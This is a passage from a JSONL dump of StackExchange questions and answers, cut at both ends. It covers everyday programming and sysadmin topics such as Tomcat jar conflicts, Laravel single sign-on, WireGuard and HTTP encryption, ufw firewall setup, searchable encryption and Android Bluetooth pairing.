eclipse, it works fine. But when I copy past the war in my webapps folder of tomcat, it doesn't start from tomcat.\nActual: Application starting from Eclipse and not from tomcat.\nExpected: Application should start from tomcat and Eclipse both.\nAnswer: when we open the dependency hierarchy in pom.xml, we see some duplicate jars. Exlipse takes care of the conflicted jars, though tomcat is not able to. So I checked the classes, exactly which version the jar was used in eclipse. Kept only those and excluded or commented the other conflicting mongo dependency. And it worked.\n","meta":{"source":"stackoverflow","title":"How to fix 'duplicate key issue of mongodb' after the version upgrade of other dependent projects in pom.xml","dup_signals":{}},"subset":"stackexchange"} +{"text":"NSIS license page\n\nQuestion: Is there anyway you could resize the rich textbox in the license page of an NSIS installer? \nThanks...\nAnswer: \nthere are several choices that affect the size a little bit, checkbox vs button etc\nSwitch to the Modern UI if you are not already using it\nCopy and resize one of the dialogs in \\Contrib\\UIs with resource hacker and use ChangeUI in your script\nCall GetWindowRect\/ScreenToClient\/SetWindowPos with the system plugin at runtime in the show callback function for the page\n","meta":{"source":"stackoverflow","title":"NSIS license page","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why does this function return only true, since there is no else statement to make it return false under a non true condition?\n\nQuestion: It seems to me that this bit of code is asking the function to return false regardless of what is internally going on. I only know to use <code>else<\/code> statements to return false values, but maybe there is something behind the scenes that I am not seeing that someone else could explain? \n\nChallenge: Create a function that takes two arguments, an array of numbers (arr) and a number value (n). All you need to do is check whether the provided array contains the number value (n) or not. Return true if the array contains the value, false if not.\n\n<code>function isItThere(arr, n) {\n \n for (var i = 0; i < arr.length; i++) {\n if (arr[i] === n) {\n return 'true';\n }\n } return 'false';\n}\n\nconsole.log(isItThere([1,3,5,6,7,8,9], 3));<\/code>\nComment: The function has two points of exit. As soon as one of them is reached the function exits with the supplied return value.\nAnswer: The return <code>'false'<\/code> statement is executed only after the array is exhausted and the element is not found.\n\n<code>function isItThere(arr, n) {\n \n for (var i = 0; i < arr.length; i++) {\n if (arr[i] === n) {\n return 'true';\n }\n } \n return 'false';\/\/after the array search is done and not found\n}\n\nconsole.log(isItThere([1,3,5,6,7,8,9], 3));\nconsole.log(isItThere([1,3,5,6,7,8,9], 100));<\/code>\n","meta":{"source":"stackoverflow","title":"Why does this function return only true, since there is no else statement to make it return false under a non true condition?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Big text files in python\n\nQuestion: I have to write some Python code to read a file in the following format:\n<code><doc> \nHello Word\n<\/doc>\n<doc>\nHello blah blah\n<\/doc>\n<\/code>\nThen I have to count how many of those tags contains a determined word.\nFor example, if I'm searching for the word blah it should return 1, and if I'm searching for the word Hello, it should return 2.\nAlso, is there a way to do it efficiently? The files are pretty big (approximately 250mb of text).\nComment: Hello and welcome to StackOverflow. Please take some time to read the help page, especially the sections named \"What topics can I ask about here?\" and \"What types of questions should I avoid asking?\". And more importantly, please read the Stack Overflow question checklist. You might also want to learn about Minimal, Complete, and Verifiable Examples\nComment: Some general advice: Don't worry about the efficiency until you have something that works.\nAnswer: Load the file and read it line by line, incrementing occurrences.\n<code># Returns how many times s_string shows up in doc\ndef search_for( s_string, doc):\n count = 0\n with open(doc) as rfile:\n for line in rfile:\n if(line.find(s_string) > -1):\n count = count + 1\n return count\n<\/code>\nComment: I'm sure this has been asked before but here is a function that will get it done.\n","meta":{"source":"stackoverflow","title":"Big text files in python","dup_signals":{}},"subset":"stackexchange"} +{"text":"Laravel - Multi domain using single login server?\n\nQuestion: I'm setting up around 4 <code>Laravel 5.3<\/code> based apps at the moment, they are all part of one \"ecosystem\".\nI plan to use a central <code>Laravel<\/code> app that will handle any user signup, user login and also hold all user details. These details will be used across the 4 separate Laravel web apps. I may also use these user details inside mobile apps in the future so I assume i'll need some sort of JWT based system to control this.\nI've thought about using <code>Laravel Passport<\/code> to achieve this but I don't think this will work for this scenario. In all honesty, the documentation is not clear to me whether this is the sort of system it is designed for or if I need to use a different oAuth2 system. My understanding is it is for API authentication only, or am I wrong?\nAll my other Laravel apps will be on different servers so I can't share the database unfortunately. I need to implement a cross domain solution it seems.\nThanks in advance for any info on this, just to clarify that I am not asking you to code the script for me, simply to help point me in the right direction on how to do this properly - can't really show code on something I don't know!\nI believe I have explained everything that I am trying to achieve here, and I have already done research but nothing seems to be clicking in my brain.\nComment: Why the downvote? I've done research, presented my findings and asking for help... Could at least leave a reason, *sigh*\nComment: @Epodax I'm not sure how it's so broad? Passport allows for OAUTH2 server to be set up, which sounds like the right thing to do, however I don't believe it suits this project as my users will use a web app primarily, and then mobile apps later on down the line.\n\nSo my question is basically asking if there is a good way to utilise a central laravel app that contains all the users (the main site) and have the other servers speak to that to get the user data\nAnswer: I think it depends on your business logic. Below is what i'm thinking:\n\nIf what you mean <code>Multi Domains<\/code> is the sub domains (as you mentioned <code>login.site.com<\/code>), i think the simplest way is to use <code>site.com<\/code> wide cookie with redis\/memcached as the session storage solution.\nIf they do have different domain names, and beyond the central site, user when visit site A also want site B feature (or content, those sites are closely connected), i thought the JWT solution is the better choice.\nAny other cases, choose OAuth\n\nWell, maybe others have better ideas.\nComment: That's a good answer and makes sense. It's likely that I will have one central site like this `maincompany.com` where user data, user sign up and user register will be handed, and then the multi apps that are part of this umbrella are separate servers\/domains like `app1.com`, `app2.com` and `app3.com` all hosted on different Laravel Forge deployed servers. Looks like I'll probably go with option 2, at least until i've explored `Passport`'s complete capabilities :)\n","meta":{"source":"stackoverflow","title":"Laravel - Multi domain using single login server?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Differentt style if it's OS \/ iphone\n\nQuestion: I have a problem in rendering my fonts in iphone, or ipad, this is my proposal by JS, does'nt work ?\n<code>var iOS = \/iPad|iPhone|iPod\/.test(navigator.userAgent) && !window.MSStream;\nvar x = document.getElementsByTagName(\"h1\");\nvar i;\n\nif (iOS) {\n for (i = 0; i < x.length; i++) {\n x[i].style.letterSpacing = \"0px!important\";\n}\n}\nelse { \n for (i = 0; i < x.length; i++) {\n x[i].style.letterSpacing = \"2px!important\";\n} \n}\n<\/code>\nAnswer: I believe the issue is because you need a space in between the sizing and the '!important' attribute.\nThis:\n<code>x[i].style.letterSpacing = \"2px!important\"\n<\/code>\nbecomes\n<code>x[i].style.letterSpacing = \"2px !important\"\n<\/code>\nOn another point, I'd recommend declaring 'i' in the for loop, unless you specifically need it later on. Also, I'd recommend keeping your code tidy, even in development, and especially when asking others for help, as you have a couple indentation problems.\n","meta":{"source":"stackoverflow","title":"Differentt style if it's OS \/ iphone","dup_signals":{}},"subset":"stackexchange"} +{"text":"Serving local HTTP over VPN\n\nQuestion: I'm running a server on my LAN.\nIt's setup as a Webserver that's only listening to local connections and a WireGuard VPN server.\nWhen I'm not at home, I establish a connection to the vpn.\nThe webserver is using http only. I've set up an nftables rule that masquerades requests from my vpn ip to my webserver in order to access those pages.\nWireGuard is left with default settings, so it just establishes a connection between server and client.\nSince I'm entering sensitive information on these websites, I'm wondering if the connection is encrypted through the vpn tunnel or if https is necessary to be on the safe side.\nMy LAN is trustworthy. VPN server and webserver are running on the same machine.\nComment: You are not serving local HTTP over VPN, according to the details you provide. Can you clarify this point?\nComment: Can you explain \"I do not route all traffic through that VPN, only DNS requests.\"\nComment: I'm beginning to think that the answer is: it depends on how you set it up. All we are doing is asking for details on how you set it up. Please provide the full details.\nComment: Again, this line \"The vpn is not set to route all traffic through the tunnel.\" is the crucial one that you need to explain. What ***is*** sent through the tunnel?\nAnswer: You question isn't very clear. You wrote:\n\nI'm connecting to that server via VPN (wireguard).\n\nAnd after:\n\nI do not route all traffic through that VPN, only DNS requests.\n\nSo, if the HTTP stream between your client and your server isn't routed throught VPN, then the connection isn't encrypted.\nAt contrary, if you route the traffic to your HTTP server throught the VPN, then it's encrypted.\nNevertheless, keep in mind that traffic between your VPN gateway and your HTTP server will remain clear.\nComment: That's my question. When I connect to a Webserver that's only accessible through that VPN, is that connection encrypted by the vpn? The Webserver that's hosting the websites is also the VPN gateway\nComment: @Unkn0wn accessed through VPN == encrypted by the VPN if the VPN encrypts its traffic.\n","meta":{"source":"security.stackexchange","title":"Serving local HTTP over VPN","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to compare three boolean values\n\nQuestion: Compare three boolean values and display the first one that is true.\nHey guys, I am trying to write a program that compares three boolean values and displays the first true one. I am comparing three words for their length, and it will display the longest. The error that I am getting is that my else tags aren't working. Take a look at the code.\n<code>\/\/Check which word is bigger\n if (len1 > len2)\n word1bt2 = true;\n\n if (len2 > len3)\n word2bt3 = true;\n\n if (len1 > len3)\n word1bt3 = true;\n\n \/\/Check which word is the longest\n if (word1bt2 == true && word1bt3 == true);\n System.out.println(wor1);\n else if (word2bt3 == true);\n System.out.println(wor2);\n else System.out.println(wor3);\n<\/code>\nI have set boolean values for word1bt2, word2bt3 and word1bt3. In eclipse, I am getting a syntax error under the elses in my code above. Any help would be great!\nComment: `else tags ` What is an else tag?\nComment: you need to add if after 1st else\nif(cond){\n... code ...} else if (cond2 ){... code ...} else {... code ...}\n\nAlso you need to fix your semicolons.\nComment: Here you should find good answer: [link](http:\/\/stackoverflow.com\/questions\/4982210\/find-the-max-of-3-numbers-in-java-with-different-data-types-basic-java)\nComment: And *please* don't write `if(xyz==true)`. Just write `if(xyz)`. There's no point in comparing booleans with `true`. You wouldn't write `if((len1 > len2) == true)`, would you?\nAnswer: <code>if (word1bt2 == true && word1bt3 == true);\n<\/code>\nIs wrong, you need to remove the semicolon:\n<code>if (word1bt2 == true && word1bt3 == true)\n<\/code>\nSame for the <code>else<\/code>s\n\n<code>else (word2bt3 == true);\n<\/code>\nIs wrong too, it should be\n<code>else if (word2bt3 == true)\n<\/code>\n\nSide note: boolean values can be used as condition, so your <code>if<\/code> statements should be\n<code>if (word1bt2 && word1bt3) \/\/ The same as if (word1bt2 == true && word1bt3 == true)\n<\/code>\nComment: Yeah, I caught the `else if` myself in the post. Didn't copy-paste. Thanks, I am new to Java so this site is great for me.\nComment: `if(bool1 && bool2)` should be used. Expressions such as `bool == true` are frowned upon\nComment: @rocketboy Completely forgot that, i updated the answer, thanks!\nAnswer: \nHow to compare three boolean values?\n\nDont!\nIf you find yourself needing to compare three variable you may as well cater for any number of variables immediately - there's no point hanging around - do it properly straight away.\n<code>public String longest(Iterator<String> i) {\n \/\/ Walk the iterator.\n String longest = i.hasNext() ? i.next() : null;\n while (i.hasNext()) {\n String next = i.next();\n if (next.length() > longest.length()) {\n longest = next;\n }\n }\n return longest;\n}\n\npublic String longest(Iterable<String> i) {\n \/\/ Walk the iterator.\n return longest(i.iterator());\n}\n\npublic String longest(String... ss) {\n \/\/ An array is iterable.\n return longest(ss);\n}\n<\/code>\nComment: The thing is that I don't understand that at all. I am learning at my own pace in which I want to understand everything that is happening.\nAnswer: Remove the <code>;<\/code> and change it with brackets <code>{}<\/code>.\n<code>if (word1bt2 && word1bt3) {\n System.out.println(wor1);\n} else if (word2bt3) {\n System.out.println(wor2);\n} else {\n System.out.println(wor3);\n}\n<\/code>\nComment: That's right, but in this case the code is easier to be read.\nComment: Brackets arent needed in that specific case\nComment: Also, the `== true` parts are redundant.\nComment: It's easier to read if you remove all the obsolete `==true` fragments. It's one thing to see them in a beginner's question but another to repeat them in the answer.\nAnswer: Issue with the else blocks: use <code>{}<\/code> insteaad of <code>()<\/code> to enclose instructions...\nRemove the <code>;<\/code> at the first if!!!!! - Quite common mistake, with very puzzling results!\n<code>\/\/Check which word is the longest\nif (word1bt2 == true && word1bt3 == true) { \/\/leave ; and always add bracket!\n System.out.println(wor1);\n}\nelse if(word2bt3 == true)\n{\n System.out.println(wor2);\n}\nelse {\n System.out.println(wor3);\n} \n<\/code>\n\nif you need a condition in an else branch, you have to use if again - plain else won't have such a feature...\nALWAYS use brackets for bodies of if statements, loops, etc!!!\nBe extremely careful NOT to use ; in the lines that don't behave well with it:\n\nif statements\nfor loops\nwhile() {...} loops' while statement\nAnswer: try this, if lenght are equal then s1 is considered as Bigger. Also i have not added null check\n<code> public class Test {\n public static void main(String[] args) {\n\n String word1 = \"hi\";\n String word2 = \"Hello\";\n String word3 = \"Hell\";\n String Bigger = null;\n if(word1.length() >= word2.length() && word1.length() >= word3.length() ){\n Bigger = word1;\n }else if(word2.length() >= word1.length() && word2.length() >= word3.length()){\n Bigger = word2;\n }else if(word3.length() >= word2.length() && word3.length() >= word1.length()){\n Bigger = word3;\n }\n System.out.println(Bigger);\n\n }\n\n }\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to compare three boolean values","dup_signals":{}},"subset":"stackexchange"} +{"text":"Describing and comparing illustrations: is it a fit for the site?\n\nQuestion: I was wondering if someone with little knowledge of the fundamentals of graphic design could ask a question along the lines of:\nCan the technique used in this drawing(ink pen) from a professional artist be briefly summarized\/categorized and is it similar to what is seen in this other work?(showing details for both)\n\nIs it about illustration, or more generally, is it within the scope of the site?\nIs it interesting for the community on the site?\nIf not, do you know of an SE asset where this works?\nComment: Thank you for the answers!\nAnswer: It's not \"My Adobe isn't working\" so I say.. yes... it's on topic and will at least break up the monotony of those wanting help with software.\nComment: I use Gimp anyway ;)\nAnswer: I think it is \u2013 with good examples, I think these kind of questions would be quite interesting. It might be about placing visuals in historical, artistic context and I for one would like to see more questions about the bigger picture of what we do.\nComment: Admittedly I know nothing about the history of art but I think the first thing I can do is to properly identify(attribute) the time where the work was created and read a bit about the artist.\nAnswer: I would just make the question and tag it style-identification and illustration. If we don't like it we'll remove it.\nMy worry is to not have style-identification become as horrendous as font-identification. If the question is even remotely similar to a typical font-id question (no effort on your part) then I'll be the first to down-vote and close-vote it.\nComment: I've taken a look at the font-identification content and I understand. I don't think it would be like that. What I'm trying to avoid on the contrary is too wide a scope and\/or too many subquestions...\n","meta":{"source":"graphicdesign.meta.stackexchange","title":"Describing and comparing illustrations: is it a fit for the site?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Database design for optional fields\n\nQuestion: I've got 3 tables:\n\norders\nline_items\nproducts\n\nThey're setup as: \n\norder has many products through line_items\n\nThis allows me to store in line_items such things as the product_id, quantity, price at time of purchase, discount, etc...\nAll is well up to this point.\nWhat I'm looking to achieve:\nI now need to have some products that have a user changeable status. Meaning that at some point in the future after an order has been processed, the purchased product status can be changed from one status to another.\nThe product table has a statusable boolean field that tracks whether said product supports a status.\nThe question:\nWould I just add a status field in line_items? Only a small amount of the products will require a status so it feels like a waste but I'm not sure how else to approach this hurdle. My main concern being that I'll end up with a massive table as the application grows and specific products require extra optional fields.\nComment: Your `order` and `line_item` records should be *immutable*, in *append-only tables*, as should the copies of *product* for the orders. So if you must change something after the fact, I'd put it in separate table like `product_status` that you can insert status rows into at order creation time for products that can have a status. Make that table updateable so you can update the status and *only* the status later. It should be impossible for users to edit any other part of the order after the fact - they should have to *append* amendments instead.\nComment: @Vasseurth Well, you could use database column-level permissions to grant `INSERT` on all `order` columns but only grant `UPDATE` on the `state` column, I guess. Personally I'd use a side-table so I could keep `orders` append-only, but that's a design preference. Either way you should make sure no other columns can be changed.\nComment: Rationale: The order is a record of something that happened, not live state. So it should be immutable. Mistakes should be corrected with journaled amendments.\nComment: Thanks @CraigRinger for the explanation, would you mind answering this corollary. If an order has a state (i.e. shipped), should that not be a field in the orders table?\nComment: Totally agree @CraigRinger. To be clear, you're suggesting a simple table for each post-purchase configurable product option and programmatically assigning the line_item.id to the option?\nComment: @Vasseurth I'd also say to be careful with putting the shipped state on the order. Especially if you support partial shipping, in that case you'd want to manage it at the line item level.\nComment: Well, I hardly know what the actual data model and real needs are, so all I can do is make very broad comments. It *sounds* like a `product_status (order_id integer, product_id integer, primary key(order_id, product_id), status whatevertype)` table would be appropriate, but it's hard to know w\/o a real analysis of the problem with full details. Also, Rails is probably going to explode and die if you do anything like actually use database features like composite keys and column permissions.\nAnswer: There are two options for this:\n\nCreate a column in the join model\nCreate a separate \"statuses\" table, which you can use to create specific status updates\n\n--\nAttribute\nI would personally create a column in the join model to support a <code>status<\/code>. Yes, it will require you to have that column for every <code>line_item<\/code>, but it will make the process much simpler, and will give extensibility without massive issues\nYou'll be best using one of the state machine gems (<code>state_machine<\/code>, <code>aasm_state<\/code>) to provide:\n<code>#app\/models\/line_item.rb\nClass LineItem < ActiveRecord::Base\n include AASM\n\n aasm do\n state :active, :initial => true\n state :inactive\n\n event :activate do\n transitions :from => :inactive, :to => :active\n end\n\n event :deactivate do\n transitions :from => :active, :to => :inactive\n end\n end\nend\n<\/code>\nThis will give you the ability to directly affect the status of the <code>line_item<\/code> model\n--\nAssociated Model\nAlternatively, you may want to create a different table \/ model:\n<code>#app\/models\/line_item_status.rb\nClass Status < ActiveRecord::Base\n #field id | line_item_id | status | created_at | updated_at\n belongs_to :line_item\nend\n\n#app\/models\/line_item.rb\nClass LineItem < ActiveRecord::Base\n has_one :status\n delegate :status, to: :status #-> allows you to call @line_item.status\nend\n<\/code>\nThis will give you the ability to set the status for each product, making your data tables more efficient by only including a single <code>status<\/code> for each <code>line_item<\/code>\nComment: Thanks @RichPeck, how would you deal with the addition of other post-purchase mutable properties? For example, some products have a state which your solution addresses but looking into the future as other products require different properties such as some products may be redeemable and so on... Feels like there'd be a better way to manage that instead of creating an associated model for each new mutable product property. Hope that makes sense.\n","meta":{"source":"stackoverflow","title":"Database design for optional fields","dup_signals":{}},"subset":"stackexchange"} +{"text":"Restricting Internet access of applications in Ubuntu\n\nQuestion: I want to block access to the Internet for all apps and process on my machine except for ones specifically allowed. I used to achieve this with Firewall when I was using Windows. I have a very tight data plan (3rd world country problems) so I have to watch which apps use the Internet. How can I achieve this in Ubuntu 16.04 LTS? \nEdit: Most of the answers I found here are either about blocking certain sites or blocking a certain app rather than blocking the entire app list and allowing only a handful apps. \nAnswer: This might be not as easy as you might want, firewalls can be a tricky topic. A widely used Linux firewall is 'ufw' it is part of the standard install. There is a graphical interface called 'gufw' which has an easy setting mode for getting started quickly, but also allows to fine tune rules in the graphical application. \nJust install it with the line\n<code>sudo apt install gufw\n<\/code>\nHowever, please note that all Linux firewalls I am aware of are based on ports, not with applications. Actually the firewall only sees network traffic going in or going out, but I can not tell which application sent that traffic. All applications send their traffic to a certain port, e.g. Port 80 for standard HTTP traffic. You can very fine tune what happends to your traffic based on ports and it can get complicated very quickly (for example with FTP) but you can not say for example firefox can send traffic on port 80 but chrome can not. I do not know how the windows firewall does it, or whether it only seems to do that. I just now that the dialog there gives a list of applications. \nSo if you can work out your problem based on ports that your application use, you have all fexlibility you need. What I like about the gufw tool is that is has a rather safe quick setup mode that is quite useful to quickly lock up a mobile computer completely when using a public hotspot and just open a single hole for a specific port only.\nHope it helps. \nComment: Neither iptables or ufw\/gufw will filter by application. You can use iptables to filter by process owner.\nComment: Its odd that Linux uses port based firewall. I don't know much about this stuff but based on your explanations, I think I can't block specific apps but rather services\/protocols, right? For example I can stop all HTTP by blocking port 80. Am I right?\nComment: Your are right. There is a way, as bodhi.zazen points out, via the PID. The firewall could find out the PID an as each running app has a unique PID there could be a lookup on process information for that PID. But thats very advanced firewall setup and programming. But adding complexity like that into a firewall is usualy way to decrease security, not to increase it. For a non expert of firewall interia its probably way out of reach. I think you will find that you already come a long way to your target by using what ufw has to offer.\nComment: @the downvoter. I always think its quite unfair to downvote an answer without telling why. I can not see what is wrong with it, please advice.\nComment: You can not filter by pid.\nComment: Thanks for the info. I did not mean filter directly, but more working out at a low level in the ip table definitions. I am quite sure it did work, because I had intended to achieve the same as the OP when coming from windows, but it seems nightmarish and very cumbersome to solve. But I would have to look up the details again. Anyway not a good idea thing to do, still\nComment: @CatMan filtering by PID, if possible, would be tedious since I'll have to change the PID every time I reopen the process.\nComment: @tamrat - No iptables will not filter by PID. See http:\/\/www.spinics.net\/lists\/netfilter\/msg49716.html\nComment: OK, I have looked quite a lot in to this. And I think I figured out why there aren't a lot of such apps around. I connected my machine to the Internet via my phone's cellular hotspot and noticed something beautiful under the Resources tab in System Monitor. There aren't any applications that use Internet because the received and sent bytes stay constant. I am not sure, but it appears that Ubuntu doesn't use a lot of background data.\nComment: Hey that is great. Just to be on the safe side I would still recommend you to install the firewall and open the ports you expect to need.\n","meta":{"source":"askubuntu","title":"Restricting Internet access of applications in Ubuntu","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to arrange images in a hierarchical structure?\n\nQuestion: Something like this picture\n\nI've tried to use <code>ImageCollage<\/code> with different weights and other conditions, but all of them arrange pictures arbitrarily. For instance\n<code>ImageCollage[{4 -> im0, 1 -> im1, 1 -> im2}, Background -> None] \n<\/code>\norganize the images horizontally:\n\nand so on.\nComment: closely related \/ possible duplicate : [Spanning\/centering elements with Grid\/GraphicsGrid when there's a non-equal number of elem. in rows](https:\/\/mathematica.stackexchange.com\/q\/65211\/125)\nAnswer: <code> SeedRandom@2;\n p = Table[BarChart[RandomReal[1, 5]], 7];\n\nGrid[{{p[[1]], SpanFromLeft}, {p[[2]], SpanFromLeft, p[[3]], \n SpanFromLeft}, Join @@ {p[[4 ;; 7]]}}, Frame -> All, \n Alignment -> Center]\n<\/code>\nAnswer: <code>Module[{pl, w = 500, h = 100},\n pl[frac_] := Framed[\n BarChart[\n RandomReal[1, 5]\n , AspectRatio -> frac h\/w\n , PlotTheme -> \"Scientific\"\n , ImageSize -> 0.9 {w\/frac, h}\n ], ImageSize -> {w\/frac, h}];\n GraphicsGrid[\n {\n PadRight[{pl[1]}, 4, SpanFromLeft],\n {pl[2], SpanFromLeft, pl[2], SpanFromLeft},\n {pl[4], pl[4], pl[4], pl[4]}\n }\n , ImageSize -> {w, 4 h}\n , Spacings -> {0, 0}\n ]]\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"How to arrange images in a hierarchical structure?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to require namespace inside function -main?\n\nQuestion: Suppose that in Leiningen project yo, I have these files:\nfoo.clj:\n<code>(ns yo.foo)\n(def x 234.5)\n<\/code>\nbar.clj:\n<code>(ns yo.bar)\n(def x -15)\n<\/code>\nAnd I have a main file (core.clj):\n<code>(ns yo.core)\n(require '[yo.foo :as f])\n(when (= f\/x 234.5) (println \"Succesfully required foo.\"))\n(defn -main [& args]\n (println (require '[yo.bar :as b]))\n ;(when (= b\/x -15) (println \"Succesfully required bar.\"))\n )\n<\/code>\nWhen I enter \"lein run\" on the command line, I get this output:\n<code>Succesfully required foo.\nnil\n<\/code>\nThe first line tells me that I understand how to use the <code>require<\/code> function at the top level of a file. (Normally I would use <code>:require<\/code> in the <code>ns<\/code> statement.) The second line seems to indicate that I successfully required <code>yo.bar<\/code>.\nHowever, when I uncomment the line containing <code>when<\/code> in <code>-main<\/code>, I get an exception:\n<code>java.lang.RuntimeException: No such namespace: b, compiling:(yo\/core.clj:6:9)<\/code>.\nIs there a way to perform a require from inside a function? My goal is to pass the name of a namespace on the command line, and have that namespace loaded as a result. Is there another way to do this? (I already know how to access command line arguments from within <code>-main<\/code>.)\n(The problem is not that I wrapped the <code>require<\/code> call with <code>println<\/code>. I get the same exception if the first line of <code>-main<\/code> says only <code>(require '[yo.bar :as b])<\/code>.)\n(The title of this question makes it seem as if it's the same as mine, but the question and the answer don't address the problem of requiring a namespace from inside a function.)\nAnswer: The <code>require<\/code> statement within the function <code>-main<\/code> is not invoked during compilation. Thus the compiler can't resolve the namespace <code>b<\/code> and complains.\nComment: I see. i.e. the `require` does fire at runtime, but by then it's too late. Thanks Leon. This makes it sound as if there is no way to use namespaces that are chosen at runtime, except by explicitly calling the compiler or by throwing source code into a repl at runtime, or maybe using `load-file`. But I guess could use the method described in the question I linked to. That gets the namespace dynamically, but from the environment rather than by parsing command line arguments. If I wanted to pass the namespace on the command line, I could call `lein` from a shell script that sets an env var.\nComment: It turns out that I can pass code from the command line to `load-string` and have the newly loaded namespace recognized--which is what I wanted to do in the first place. Since `load-string` also causes compilation at runtime, the fact that the namespace is compiled then as well is not a problem.\nComment: How is `(require ...)` invoked during compilation when it is a top-level statement?\nComment: @HappyFace Compilation effects to invoking all top level forms\n","meta":{"source":"stackoverflow","title":"How to require namespace inside function -main?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Searching over encrypted data\n\nQuestion: Is there any library\/tool available which can allow me to search over encrypted data? \nI would like to encrypt data on client side, send it to cloud and perform search in cloud. \nI've been reading about homomorphic encryption and though there is CryptDb available which makes it possible to run encrypted DB in cloud, but my use case is slightly different- in my case I want to let users send me encrypted data and I want to be able to do a keyword search (as opposed to user performing search). \nComment: Can you be more specific with your requirement ? If users send the encrypted data to you , are you some kind of proxy ? will you know the search terms in plain text ?\nComment: See a related question: http:\/\/crypto.stackexchange.com\/questions\/3446\/is-it-possible-to-match-encrypted-documents-using-user-defined-search-terms\nComment: @sashank I may or may not know search terms. Ideally not, but I am okay with a design if I will be required to receive keywords in plaintext\nComment: This is a duplicate of [Is it possible to match encrypted documents using user-defined search terms?](http:\/\/crypto.stackexchange.com\/q\/3446\/351). There are rich variety of techniques for solving this problem. See my answer there for an entry-point into the literature.\nAnswer: I don't think there is an existing library that can satisfy your needs.\nHomomorphic encryption is powerful and requires lots of computations. However, in your case which allows user-defined keywords, I suggest you to take a look at Searchable Encryption. \nSearchable Encryption is the algorithm that should be of interest. It allows cloud server to search 'blindly' on client's encrypted data, based on a 'trapdoor' - a token that contains keywords to be searched for - sent by the client. Of course, client must also encrypt the keywords along the encrypted data before uploading them, which will surely increase the overhead. For 'blindly' it means the cloud server doesn't acquire any unnecessary knowledge about the searched keywords and the encrypted data, during the entire query process. \nSome of the searchable encryption algorithms are based on pairing-based cryptography. In that case, you can build your application based on PBC library.\nAnswer: Take a look at the SSARES system. According to the abstract,\n\nOur solution encrypts email (the headers, body, and attachments) as it arrives on the server using public\u2013key encryption. SSARES uses a combination of Identity Based Encryption and Bloom Filters to create a searchable index.\nThis index reveals little information about search keywords and queries, even against adversaries that compromise the server. SSARES remains largely transpar-\nent to both the sender and recipient.\nComment: Hello insane and welcome to Crypto.SE. I've edited your answer because the previous link didn't lead to the PDF directly. I've also quoted a few paragraphs from the abstract. This IMO makes for some better content overall. If you feel I've overstepped, you can always roll back to the original, but please quote me in a comment so I know what could have been done better. Cheers\nComment: Your edit is \"fine\". The thing is, that I already used the implementation and would actually recommend to ask the author for the code. That got lost.\nAnswer: In your requirement , \n\nif the users trust you , they may share their key's as well with you to perform search operations on their behalf and you act as proxy to send the queries and receive results \nIf the users don't trust you, then you would just be a relay agent for the cloud , instead users can search directly over the cloud to reduce the latency.\n\nApart from the search over encryption links suggested above in the comments, you may \nwant to look at CP-ABE schemes as well , Cipher Text Policy Attribute Based Encryption library.\n","meta":{"source":"crypto.stackexchange","title":"Searching over encrypted data","dup_signals":{}},"subset":"stackexchange"} +{"text":"why navigator.contacts.create() coming as Cannot call method 'create' of undefined?\n\nQuestion: I am going to save contact number in device using phone gap build. I have written below logic. build the apk file from phone gap build website. when invoke below function getting error in line navigator.contacts.create(); contacts.create undefined. Is any thing i missed in code or what?. Anybody help me. great appreciate. Thank you.\n<code>\/\/ create a new contact object\n var contact = navigator.contacts.create();\n contact.displayName = conatctName;\n\n\/\/ save First and Last name\nvar name = new ContactName();\nname.givenName = fName;\nname.middleName = mName;\nname.familyName = lName;\ncontact.name = name;\n\n\/\/ save cell-phone and office-phone\nvar phoneNumbers = [];\nphoneNumbers[0] = new ContactField('work', workNum, false); \nphoneNumbers[1] = new ContactField('mobile', mobileNum, true);\n\ncontact.phoneNumbers = phoneNumbers;\ncontact.save();\nalert(\"Contact Saved\"); \n<\/code>\nComment: have you wrapped the code in device ready ???\nComment: ya, after device ready only. i am calling. This function feature is after navigation tow screens. but is is not working.\nComment: which version of cordova and have u added the permission in androidmanifest file ?\nComment: I don't have any androidmanifest file. i have done code in HTML5 using NetBeans developer IDE. I have zip entire project and uploaded in to build phone gap website. Within project i have config.xml file. Thank you.\nAnswer: Check your config.xml file (or post it).\n<code><plugin name=\"Contacts\" value=\"org.apache.cordova.ContactManager\" \/>\n<\/code>\nComment: I have added these feature and plugin. but not working same error.\n","meta":{"source":"stackoverflow","title":"why navigator.contacts.create() coming as Cannot call method 'create' of undefined?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why do I receive ACTION_ACL_DISCONNECTED after pairing\n\nQuestion: For Android, I've written some code with a service that upon execution, the service looks for my BT device and calls device.createRfcommSocketToServiceRecord for paired devices that it finds (right now, only one). This works great.\nFor testing purposes, while the service is running, I, manually, unpair and then pair it again. When I do this, I get the pairing and connect, but then I receive ACTION_ACL_DISCONNECTED.\nIn short, it looks like this:\nWhen I pair, I get the following:\n<code>I\/MainService\ufe55 Entering Service bcrcvrBluetooth bcReceiver: Action = android.bluetooth.device.action.BOND_STATE_CHANGED\nI\/MainService\ufe55 Service bcrcvrBluetooth: action = BluetoothDevice.ACTION_BOND_STATE_CHANGED\nI\/MainService\ufe55 Prev State: BluetoothDevice.BOND_NONE\nI\/MainService\ufe55 New State: BluetoothDevice.BOND_BONDING\n<\/code>\nThen it is time to enter the pin. Afterwards, I see the following:\n<code>I\/MainService\ufe55 Entering Service bcrcvrBluetooth bcReceiver: Action = android.bluetooth.device.action.ACL_CONNECTED\nI\/MainService\ufe55 Service bcrcvrBluetooth: action = BluetoothDevice.ACTION_ACL_CONNECTED\n\nI\/BTDevice\ufe55 Creating socket\nI\/BTDevice\ufe55 Device socket created\n\nI\/MainService\ufe55 Entering Service bcrcvrBluetooth bcReceiver: Action = android.bluetooth.device.action.BOND_STATE_CHANGED\nI\/MainService\ufe55 Service bcrcvrBluetooth: action = BluetoothDevice.ACTION_BOND_STATE_CHANGED\nI\/MainService\ufe55 Prev State: BluetoothDevice.BOND_BONDING\nI\/MainService\ufe55 New State: BluetoothDevice.BOND_BONDED\nI\/MainService\ufe55 Device Paired.\n\nI\/MainService\ufe55 Entering Service bcrcvrBluetooth bcReceiver: Action = 